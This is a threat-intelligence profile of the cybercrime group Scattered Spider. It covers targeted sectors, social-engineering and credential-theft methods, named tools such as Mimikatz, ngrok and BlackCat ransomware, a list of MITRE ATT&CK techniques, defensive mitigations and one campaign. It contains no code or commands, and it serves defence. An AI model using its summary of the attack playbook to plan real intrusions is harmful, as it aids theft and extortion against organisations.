Scattered Spider – Threat Actor

Overview

Scattered Spider is a native English-speaking cybercriminal group that has been active since at least 2022. Initially, the group targeted customer relationship management (CRM) and business process outsourcing (BPO) firms, as well as telecommunications and technology companies. In 2023, Scattered Spider expanded its operations to include victims in the gaming, hospitality, retail, managed service provider (MSP), manufacturing, and financial sectors. 

Common targets

Telecommunications, Technology, Gaming, Hospitality, Retail, Manufacturing, Financial Services, Managed Service Providers (MSPs).

Attack Vectors

Exploitation of vulnerabilities, spearphishing, phishing, ransomware, compromised credentials

How they operate

Scattered Spider is a sophisticated cybercriminal group that has been active since at least 2022, primarily targeting a broad spectrum of industries to achieve financial gain through illicit means. Initially focusing on sectors like customer relationship management (CRM), business-process outsourcing (BPO), telecommunications, and technology firms, their operations expanded significantly by 2023. They began targeting new sectors including gaming, hospitality, retail, managed service providers (MSPs), manufacturing, and financial institutions. The group employs a multifaceted approach combining advanced technical capabilities with social engineering tactics to infiltrate and compromise targeted organizations. Their operational strategies involve exploiting vulnerabilities in public-facing applications and conducting highly targeted phishing campaigns. Once initial access is gained, Scattered Spider leverages various techniques to escalate privileges and move laterally within compromised networks. Tools like Impacket are utilized for domain replication, while sophisticated credential theft methods, including the use of Mimikatz and phishing for credentials, allow them to expand their foothold. Data exfiltration is a key objective, with Scattered Spider targeting sensitive information stored in cloud environments and on-premises servers. They exfiltrate stolen data through secure tunnels to remote web servers or cloud storage platforms, enhancing their ability to profit from stolen information. In cases where immediate financial gain is the goal, they deploy ransomware such as BlackCat, encrypting critical files and demanding ransom payments from victims for decryption. Social engineering plays a pivotal role in their operations, where they impersonate legitimate IT personnel to manipulate employees into providing access credentials or unwittingly downloading malicious tools. This tactic not only aids in initial access but also in maintaining persistence within compromised networks. To facilitate their operations, Scattered Spider employs a diverse array of tools and malware. These include remote access Trojans (RATs) like WarzoneRAT for remote access, credential theft tools like Mimikatz and LaZagne, and infrastructure tools such as ngrok for creating secure tunnels. They also utilize reconnaissance tools like Impacket for network enumeration and data-stealing malware like Raccoon Stealer for capturing browser history and session cookies.

MITRE tactics and techniques

Enterprise

• T1087 .002 Account Discovery: Domain Account
• T1087 .003 Account Discovery: Email Account
• T1087 .004 Account Discovery: Cloud Account
• T1098 .001 Account Manipulation: Additional Cloud Credentials
• T1098 .003 Account Manipulation: Additional Cloud Roles
• T1098.  05 Account Manipulation: Device Registration
• T1217 Browser Information Discovery
• T1580 Cloud Infrastructure Discovery
• T1538 Cloud Service Dashboard
• T1136 Create Account
• T1486 Data Encrypted for Impact
• T1530 Data from Cloud Storage
• T1213 .002 Data from Information Repositories: Sharepoint
• T1213 .003 Data from Information Repositories: Code Repositories
• T1074 Data Staged
• T1006 Direct Volume Access
• T1484 .002 Domain or Tenant Policy Modification: Trust Modification
• T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
• T1190 Exploit Public-Facing Application
• T1068 Exploitation for Privilege Escalation
• T1133 External Remote Services
• T1083 File and Directory Discovery
• T1657 Financial Theft
• T1589 .001 Gather Victim Identity Information: Credentials
• T1564 .008 Hide Artifacts: Email Hiding Rules
• T1656 Impersonation
• T1105 Ingress Tool Transfer
• T1556 .006 Modify Authentication Process: Multi-Factor Authentication
• T1556. 009 Modify Authentication Process: Conditional Access Policies
• T1621 Multi-Factor Authentication Request Generation
• T1046 Network Service Discovery
• T1588 .002 Obtain Capabilities: Tool
• T1003 .003 OS Credential Dumping: NTDS
• T1003. 006 OS Credential Dumping: DCSync
• T1069 .003 Permission Groups Discovery: Cloud Groups
• T1566 .004 Phishing: Spearphishing Voice
• T1598 Phishing for Information
• T1598. 001 Spearphishing Service
• T1598. 004 Spearphishing Voice
• T1572 Protocol Tunneling
• T1090 Proxy
• T1219 Remote Access Software
• T1021 .007 Remote Services: Cloud Services
• T1018 Remote System Discovery
• T1539 Steal Web Session Cookie
• T1553 .002 Subvert Trust Controls: Code Signing
• T1552 .001 Unsecured Credentials: Credentials In Files
• T1552 .004 Unsecured Credentials: Private Keys
• T1204 User Execution
• T1078 .004 Valid Accounts: Cloud Accounts
• T1102 Web Service
• T1047 Windows Management Instrumentation

Mobile

• T1660 Phishing

Mitigations

Here are some mitigations to consider against threats posed by groups like Scattered Spider:

• Implement Multi-Factor Authentication (MFA): Enforce MFA across all user accounts to mitigate credential theft and unauthorized access.
• Regular Security Awareness Training: Educate employees about phishing tactics and social engineering techniques to reduce the likelihood of successful attacks.
• Patch and Update Systems: Regularly apply security patches and updates to all software and systems to mitigate vulnerabilities that could be exploited by attackers.
• Network Segmentation: Implement network segmentation to limit lateral movement in case of a breach, isolating critical systems from less sensitive ones.
• Use Endpoint Detection and Response (EDR) Tools: Deploy EDR tools to detect and respond to suspicious activities and potential breaches in real-time.
• Monitor and Analyze Network Traffic: Employ network monitoring tools to detect anomalous traffic patterns and behaviors indicative of a compromise.
• Data Encryption: Encrypt sensitive data both at rest and in transit to protect it from unauthorized access in case of a breach.
• Backup and Disaster Recovery Plan: Maintain regular backups of critical data and establish a comprehensive disaster recovery plan to minimize the impact of ransomware attacks.
• Access Control and Least Privilege: Enforce the principle of least privilege to restrict access rights to only those necessary for users and systems to perform their tasks.
• Incident Response Plan: Develop and regularly test an incident response plan to quickly contain and mitigate the impact of security incidents.
• Threat Intelligence and Information Sharing: Stay informed about emerging threats and tactics used by threat actors through threat intelligence sources and industry information sharing platforms.
• Secure Configuration: Ensure that systems and applications are securely configured according to industry best practices and vendor guidelines.

Significant Malware Campaigns

C0027 (June 2022 – December 2022): In this campaign, Scattered Spider accessed Azure Active Directory (AD) to identify email addresses, downloaded bulk lists of group members, and exploited vulnerabilities like CVE-2021-35464 in the ForgeRock Open Access Management (OpenAM) application server. They also used tools such as RustScan for port scanning and deployed RMM tools to maintain persistence.

References:

• Scattered Spider: What You Need to Know
• Scattered Spider
• Scattered Spider